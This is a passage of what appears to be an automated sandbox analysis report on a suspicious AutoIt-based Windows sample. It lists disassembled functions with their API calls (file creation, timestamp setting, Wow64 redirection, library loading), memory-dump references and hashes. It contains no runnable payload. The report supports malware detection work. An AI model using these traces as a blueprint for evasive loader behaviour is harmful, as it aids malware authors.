                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 007884DD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$CurrentFreeLibraryTerminate
                          • String ID:
                          • API String ID: 146820519-0
                          • Opcode ID: 660fe0b799875d69aa92651a1d17673e753434fc1230ad973b99c4246e517b50
                          • Instruction ID: bdc69b6dae5aa806591a8dfa588ccec56ceb63292f08dfa533311967a29c4013
                          • Opcode Fuzzy Hash: 660fe0b799875d69aa92651a1d17673e753434fc1230ad973b99c4246e517b50
                          • Instruction Fuzzy Hash: 4A127B71A08341DFC754DF28C484B2ABBE1FF84314F44895DE8998B292DB39ED45CB92
                          Function 007010F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00701BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00701BF4
                            • Part of subcall function 00701BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00701BFC
                            • Part of subcall function 00701BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00701C07
                            • Part of subcall function 00701BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00701C12
                            • Part of subcall function 00701BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00701C1A
                            • Part of subcall function 00701BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00701C22
                            • Part of subcall function 00701B4A: RegisterWindowMessageW.USER32(00000004,?,007012C4), ref: 00701BA2
                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0070136A
                          • OleInitialize.OLE32 ref: 00701388
                          • CloseHandle.KERNEL32(00000000,00000000), ref: 007424AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                          • String ID:
                          • API String ID: 1986988660-0
                          • Opcode ID: 0e4884f559f5fa6d298a16237066790573472bd25258e20330f830c96faeee09
                          • Instruction ID: a4e066809f6b0f41a633379466635b1f3c958a167351c2291cfeeb3a73f7df93
                          • Opcode Fuzzy Hash: 0e4884f559f5fa6d298a16237066790573472bd25258e20330f830c96faeee09
                          • Instruction Fuzzy Hash: D371A9B4A02240EEC784DFB9B9496553BF0AB883643C4C26BD00BC73A2EB3C5461CF59
                          Function 007054C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0070556D
                          • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0070557D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: acca5939bb2f824b7e7d0018b2e2d251eb2d96d32bdc2534d4c502bb2d79db85
                          • Instruction ID: a7a374b96cb0bbb9335b70a0d73ffdddc4852dfb62ef9c3cfd297baae87254fe
                          • Opcode Fuzzy Hash: acca5939bb2f824b7e7d0018b2e2d251eb2d96d32bdc2534d4c502bb2d79db85
                          • Instruction Fuzzy Hash: E2312C75A00609FFDB14CF28C880B9AB7B6FB44314F148629E91997280D775FDA4CF90
                          Function 007386AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,007385CC,?,007C8CC8,0000000C), ref: 00738704
                          • GetLastError.KERNEL32(?,007385CC,?,007C8CC8,0000000C), ref: 0073870E
                          • __dosmaperr.LIBCMT ref: 00738739
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                          • String ID:
                          • API String ID: 490808831-0
                          • Opcode ID: daf8c77105727132c271b1d3b7340197778b69ffe1222fda44566757cee08b7f
                          • Instruction ID: 114a618037103a476d1cfd97a50b7fc7250d9119a190d6cf901aebc7eb3256fd
                          • Opcode Fuzzy Hash: daf8c77105727132c271b1d3b7340197778b69ffe1222fda44566757cee08b7f
                          • Instruction Fuzzy Hash: 30018E33605720D7F6B06334684B77E27594B82778F39011AF8158B0D3DEBDCC818192
                          Function 00772FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00772CD4,?,?,?,00000004,00000001), ref: 00772FF2
                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00772CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00773006
                          • CloseHandle.KERNEL32(00000000,?,00772CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0077300D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 3397143404-0
                          • Opcode ID: 02fa9b73dbee96d6b393da137b8d440f6a4afeb0dc37aea736620141ce8cc718
                          • Instruction ID: 87f714cd80b2a3e99c9c396e1bcb38fb1903cda886fe934726a8f60b6eca9819
                          • Opcode Fuzzy Hash: 02fa9b73dbee96d6b393da137b8d440f6a4afeb0dc37aea736620141ce8cc718
                          • Instruction Fuzzy Hash: 72E0863228021477DA311755BC0EF8B3A1CD786B71F118211F719750D046A5150293AC
                          Function 00711310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                          Download Yara Rule
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 007117F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Init_thread_footer
                          • String ID: CALL
                          • API String ID: 1385522511-4196123274
                          • Opcode ID: c71776bd7f63dfa0add2f895046524114310dfa85739ce1c6033d23b7b3b8b0b
                          • Instruction ID: 66e4db4943a641686998b4d3219611b4f5ff31879cce3da1649159a638d878bf
                          • Opcode Fuzzy Hash: c71776bd7f63dfa0add2f895046524114310dfa85739ce1c6033d23b7b3b8b0b
                          • Instruction Fuzzy Hash: E522BD70608341DFC714CF18C484AAABBF1BF85314F94895DF9968B3A2D779E895CB82
                          Function 00776EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 00776F6B
                            • Part of subcall function 00704ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704EFD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LibraryLoad_wcslen
                          • String ID: >>>AUTOIT SCRIPT<<<
                          • API String ID: 3312870042-2806939583
                          • Opcode ID: 0954da4d842444b42715d49e737413a7c5e3ba76935c361542f733cea6fb9078
                          • Instruction ID: be837a65aa11e21f4ee3a0762b9ef8ded8d859433f45373e00d35b7a427b03e0
                          • Opcode Fuzzy Hash: 0954da4d842444b42715d49e737413a7c5e3ba76935c361542f733cea6fb9078
                          • Instruction Fuzzy Hash: 4AB18371108201DFCB18EF20C89596EB7E5BF94350F048A5DF59A972E2DB38ED45CB92
                          Function 00772557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID: EA06
                          • API String ID: 2638373210-3962188686
                          • Opcode ID: 5671f183bdfbeba1a9fe89bb8291da959a6f8cc48f1f7e7b58fc0ed30a878620
                          • Instruction ID: 8c806abd8475b6c91b2d03ae11fab6a70624f55eedb80109b3a028c72968ff62
                          • Opcode Fuzzy Hash: 5671f183bdfbeba1a9fe89bb8291da959a6f8cc48f1f7e7b58fc0ed30a878620
                          • Instruction Fuzzy Hash: BC01B971904268BEDF18D7A8C85AEAE7BF89B15311F00459EE192D2181E578E7148B60
                          Function 00703837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                          Download Yara Rule
                          APIs
                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00703908
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: IconNotifyShell_
                          • String ID:
                          • API String ID: 1144537725-0
                          • Opcode ID: caf12b09a3949e84ed59bc8075615dea24a5653ea9b371e8b6dbf000c6ac3841
                          • Instruction ID: a4264fb4ff1feac87c74587a8210fe824317e5d8446aff51828fc6c5199744f1
                          • Opcode Fuzzy Hash: caf12b09a3949e84ed59bc8075615dea24a5653ea9b371e8b6dbf000c6ac3841
                          • Instruction Fuzzy Hash: D831BF70605301DFD721DF24D884797BBF8FB49308F004A6EF59A83290E779AA44CB52
                          Function 00705745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0070949C,?,00008000), ref: 00705773
                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0070949C,?,00008000), ref: 00744052
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 4d4e11132f3e2a931d2f057d9821e0e75b146b7e7d4eeb9fa649082f6f7cb31e
                          • Instruction ID: a4f9abc7cb251127e4b5b86f059e78e0b305515904647277bbeb0966d1ba1559
                          • Opcode Fuzzy Hash: 4d4e11132f3e2a931d2f057d9821e0e75b146b7e7d4eeb9fa649082f6f7cb31e
                          • Instruction Fuzzy Hash: BD015231185225F6E7314A2ADC0EF977F98EF027B0F14C311BA9C5A1E0CBB85855DB94
                          Function 00706E14 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00709879,?,?,?), ref: 00706E33
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00709879,?,?,?), ref: 00706E69
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide
                          • String ID:
                          • API String ID: 626452242-0
                          • Opcode ID: 3200aea5488a1f228f4cfbd845e013dead8b1b65ef86966b9c96984ed7eb051a
                          • Instruction ID: 46f50962ca954b483c6dd8af1347210057ae7da2aa1cfc0506a4b324ebde407c
                          • Opcode Fuzzy Hash: 3200aea5488a1f228f4cfbd845e013dead8b1b65ef86966b9c96984ed7eb051a
                          • Instruction Fuzzy Hash: 0F01BC71304204BFEB196BA9DD1AF7F7AA9DB85700F14413EF106DA1E1E9A4AC008639
                          Function 02531070 Relevance: 1.7, APIs: 1, Instructions: 161COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 025308E0: GetFileAttributesW.KERNELBASE(?), ref: 025308EB
                          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 025311B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AttributesCreateDirectoryFile
                          • String ID:
                          • API String ID: 3401506121-0
                          • Opcode ID: eaba09c8ce65dda54e360e5c8dec5ecfa7a10a04309edb6bf16c39a3a4da400e
                          • Instruction ID: 930b26e7f50b9182c6973c28d6237b230fd6b4907d8f464ab7d55ea959697509
                          • Opcode Fuzzy Hash: eaba09c8ce65dda54e360e5c8dec5ecfa7a10a04309edb6bf16c39a3a4da400e
                          • Instruction Fuzzy Hash: 07516631A1020997DF14EFB0C854BEE773AFF58700F005569B609EB290EB799B54CBA5
                          Function 00704ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00704E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00704EDD,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E9C
                            • Part of subcall function 00704E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00704EAE
                            • Part of subcall function 00704E90: FreeLibrary.KERNEL32(00000000,?,?,00704EDD,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704EC0
                          • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704EFD
                            • Part of subcall function 00704E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00743CDE,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E62
                            • Part of subcall function 00704E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00704E74
                            • Part of subcall function 00704E59: FreeLibrary.KERNEL32(00000000,?,?,00743CDE,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E87
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Library$Load$AddressFreeProc
                          • String ID:
                          • API String ID: 2632591731-0
                          • Opcode ID: d13559f202c12981918ea1e41a88216e30caa4b2d56e461778a70d7ee4c6dfcd
                          • Instruction ID: a2ead5aec99a97718dbdbe7ae85fde52c3638a7c1cf4917d3d38ca907024bc1a
                          • Opcode Fuzzy Hash: d13559f202c12981918ea1e41a88216e30caa4b2d56e461778a70d7ee4c6dfcd
                          • Instruction Fuzzy Hash: 161127B1600206EACF10BB60DC0BFAD77E4AF40711F10852DF642A61C1EFB8AA059B50
                          Function 00738402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: __wsopen_s
                          • String ID:
                          • API String ID: 3347428461-0
                          • Opcode ID: 2596838ea0aa6db92968e95934fcc28e7d82d69b9d4ceb45836c8c2978691e89
                          • Instruction ID: aad7e28aae462a080ef95f8e1f5c8d76d0beb6fd23ad48178d3fd82b870303ab
                          • Opcode Fuzzy Hash: 2596838ea0aa6db92968e95934fcc28e7d82d69b9d4ceb45836c8c2978691e89
                          • Instruction Fuzzy Hash: 4211487190420AAFDF05DF58E94499A7BF4EF48300F104059F808AB312DB31EA11CBA5
                          Function 00709A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                          Download Yara Rule
                          APIs
                          • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0070543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00709A9C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: ef818420cad98d1bf10a764d3f564d06dd4e43a944f0fc5db67918e15defe028
                          • Instruction ID: faac59267ca6f69159ee3db69866a2c905e46a36356b5413744c5d29c095342d
                          • Opcode Fuzzy Hash: ef818420cad98d1bf10a764d3f564d06dd4e43a944f0fc5db67918e15defe028
                          • Instruction Fuzzy Hash: 20113671204705DFDB20CE09C880B66B7E9AB44764F10C52EEA9B8AA92C778E945CB60
                          Function 00735000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00734C7D: RtlAllocateHeap.NTDLL(00000008,00701129,00000000,?,00732E29,00000001,00000364,?,?,?,0072F2DE,00733863,007D1444,?,0071FDF5,?), ref: 00734CBE
                          • _free.LIBCMT ref: 0073506C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                          • Instruction ID: 5b015ef142647dc0ef836d283146d716a36ae034d3fa0bd636527d67718b44f9
                          • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                          • Instruction Fuzzy Hash: AE014972204704ABF3358F75D885A5AFBECFB89370F25061DE184932C1EA35A805C7B4
                          Function 0072E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                          • Instruction ID: ff5ed68acff3ecbab3d32f4431f3af6e912c538b78e496c1241130bf45f91824
                          • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                          • Instruction Fuzzy Hash: 2AF0F432510A34EBE6313A69AC09B5A33A89F52331F100729F560921D3DB7CA80286A6
                          Function 00734C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,00701129,00000000,?,00732E29,00000001,00000364,?,?,?,0072F2DE,00733863,007D1444,?,0071FDF5,?), ref: 00734CBE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
